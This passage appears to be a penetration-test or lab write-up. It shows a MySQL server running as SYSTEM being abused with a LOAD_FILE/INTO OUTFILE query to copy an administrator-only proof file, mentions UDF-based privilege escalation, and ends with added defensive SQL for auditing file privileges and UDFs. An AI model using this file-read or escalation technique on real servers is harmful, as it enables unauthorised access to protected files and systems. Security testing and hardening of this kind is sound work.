MySQL
The target MySQL instance is running with the privileges of SYSTEM.
This means that the SQL queries executed earlier ran in the security context of SYSTEM.
Read / Write
SELECT load_file('C:\\Users\\Administrator\\Desktop\\proof.txt') INTO OUTFILE 'C:\\tmp\\proof.txt'
Copying a file that is only readable by the administrator user to the C:\tmp directory
PS C:\tmp> cat C:\tmp\proof.txt
457d6d40ae0146a717b6591f03c2d0ba
This would mean that I could virtually read/write any file on the target system. Additionally, privilege escalation is possible through the UDF exploit.
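The conditions that made the file copy above possible can be audited from the server itself. The following is an added example, not part of the original notes; it assumes an administrative MySQL session, and `'app_user'@'localhost'` is a placeholder account name.

```sql
-- Added audit example (not from the original notes).

-- 1. Is server-side file import/export restricted?
--    ''   (empty): LOAD_FILE() / INTO OUTFILE may touch any path the
--                  service account can reach (everything, when it is SYSTEM)
--    path        : restricted to that one directory
--    NULL        : import/export disabled
SELECT @@secure_file_priv AS secure_file_priv,
       CASE
         WHEN @@secure_file_priv IS NULL THEN 'disabled'
         WHEN @@secure_file_priv = ''    THEN 'UNRESTRICTED'
         ELSE 'restricted to directory'
       END AS file_io_state;

-- 2. Which accounts hold the global FILE privilege that LOAD_FILE()
--    and INTO OUTFILE require?
SELECT GRANTEE, PRIVILEGE_TYPE, IS_GRANTABLE
FROM information_schema.USER_PRIVILEGES
WHERE PRIVILEGE_TYPE = 'FILE'
ORDER BY GRANTEE;

-- 3. Review registered UDFs and the directory their libraries load from;
--    any entry that is not a known, expected function needs investigation.
SELECT @@plugin_dir AS plugin_dir;
SELECT name, dl, type FROM mysql.func;

-- 4. Remediation for an account that does not need file access
--    (placeholder account name, adjust to the finding from step 2).
REVOKE FILE ON *.* FROM 'app_user'@'localhost';
```

`secure_file_priv` is read-only at runtime, so it has to be set under `[mysqld]` in the server configuration file and takes effect after a restart. Running the MySQL service under a dedicated low-privilege account instead of SYSTEM limits what any remaining file access can reach.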